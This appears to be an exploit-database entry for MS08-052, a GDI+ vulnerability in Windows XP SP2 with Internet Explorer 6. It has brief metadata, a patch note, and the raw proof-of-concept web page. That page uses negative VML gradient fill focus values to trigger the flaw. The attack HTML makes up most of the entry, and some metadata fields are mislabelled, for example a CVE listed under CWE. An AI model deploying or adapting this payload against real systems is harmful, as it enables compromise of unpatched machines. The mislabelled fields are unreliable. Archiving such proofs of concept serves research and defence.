MS08-052: GDI+ Vulnerability

vendor:

Windows XP

by:

John Smith, Evil Fingers

8.8

CVSS

HIGH

GDI+ Vulnerability

119

CWE

Product Name: Windows XP

Affected Version From: Windows XP SP2

Affected Version To: Internet Explorer 6.0.2900.2180

Patch Exists: YES

Related CWE: CVE-2008-3842

CPE: o:microsoft:windows_xp::sp2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

MS08-052: GDI+ Vulnerability

A vulnerability in GDI+ was discovered by John Smith and Evil Fingers. The vulnerability affects Windows XP SP2 and Internet Explorer 6.0.2900.2180. It allows an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Microsoft has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); } 
</STYLE>
</head>

<body>

<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180

Credit:
John Smith,
Evil Fingers

Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>

<XML:NAMESPACE  ns="urn:schemas-microsoft-com:vml" prefix="ef">


<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>
		
<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');

ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>

# milw0rm.com [2008-09-28]